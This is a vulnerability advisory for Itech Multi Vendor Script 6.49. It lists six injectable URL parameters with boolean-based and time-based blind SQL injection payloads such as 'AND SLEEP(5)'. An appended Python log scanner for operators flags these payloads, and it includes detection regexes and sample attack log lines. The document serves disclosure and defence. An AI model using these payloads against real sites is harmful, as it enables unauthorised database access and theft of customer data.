# Exploit Title    : Itech Multi Vendor Script - Multiple SQL Injections
# Author           : Yunus YILDIRIM (Th3GundY)
# Team             : CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website          : http://www.yunus.ninja
# Contact          : yunusyildirim@protonmail.com
# Vendor Homepage  : http://itechscripts.com/
# Software Link    : http://itechscripts.com/multi-vendor-shopping-script/
# Vuln. Version    : 6.49
# Demo             : http://multi-vendor.itechscripts.com


# # # #DETAILS# # # #

SQL Injections :

# 1
http://localhost/quickview.php?id=10
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=10 AND 9776=9776

        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=10 AND SLEEP(5)

# 2
http://localhost/product.php?id=9
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=9 AND 9693=9693

        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=9 AND SLEEP(5)

# 3
http://localhost/product_search.php?search=Adidas
    Parameter: search (GET)
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: search=Adidas%' AND SLEEP(5) AND '%'='

# 4
http://localhost/product_search.php?category_id=1
    Parameter: category_id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: category_id=1 AND 8225=8225

        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: category_id=1 AND SLEEP(5)

# 5
http://localhost/product_search.php?category_id=1&sub_category_id=1&sub_sub_category_id=1
    Parameter: sub_sub_category_id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND 7485=7485

        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND SLEEP(5)

# 6
http://localhost/product_search.php?category_id=1&sub_category_id=1
    Parameter: sub_category_id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: category_id=1&sub_category_id=1 AND 5242=5242

        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: category_id=1&sub_category_id=1 AND SLEEP(5)
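
For operators of an affected install, the following is an added detection example (not part of the original advisory and not vendor code) that scans web access logs for requests to the endpoints listed above whose parameters do not have the expected shape. It assumes the scripts are served from the web root as in the advisory's URLs and that the log uses the combined format; the function names, the text-parameter pattern and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoints and parameters from the advisory. The ID parameters are plain
# integers in the advisory's URLs, so any other value is anomalous.
NUMERIC_PARAMS = {
    "/quickview.php": {"id"},
    "/product.php": {"id"},
    "/product_search.php": {"category_id", "sub_category_id", "sub_sub_category_id"},
}
TEXT_PARAMS = {"/product_search.php": {"search"}}
# Assumption: a search term never legitimately holds a quote followed by a
# boolean operator, or a call to a MySQL delay function.
TEXT_SUSPICIOUS = re.compile(r"'\s*(?:and|or)\b|\b(?:sleep|benchmark)\s*\(", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(url):
    """Return sorted (name, decoded value) pairs that break the expected shape."""
    parts = urlsplit(url)
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in NUMERIC_PARAMS.get(parts.path, ()):
            if not re.fullmatch(r"[0-9]{1,10}", value):
                hits.append((name, value))
        elif name in TEXT_PARAMS.get(parts.path, ()):
            if TEXT_SUSPICIOUS.search(value):
                hits.append((name, value))
    return sorted(hits)


def scan_access_log(lines):
    """Return [(line number, path, hits)] for log lines with anomalous parameters."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            findings.append((number, urlsplit(match.group(1)).path, hits))
    return findings


# Constructed sample lines (combined log format, documentation IP addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /product.php?id=9 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /quickview.php?id=10%20AND%209776=9776 HTTP/1.1" 200 812',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /product_search.php?search=Adidas HTTP/1.1" 200 9001',
    '203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] "GET /product_search.php?category_id=1&sub_category_id=1+AND+SLEEP(5) HTTP/1.1" 200 9001',
]
```

The same integer-only check on the numeric parameters works as an input-validation or WAF rule in front of the application until the queries themselves are parameterized.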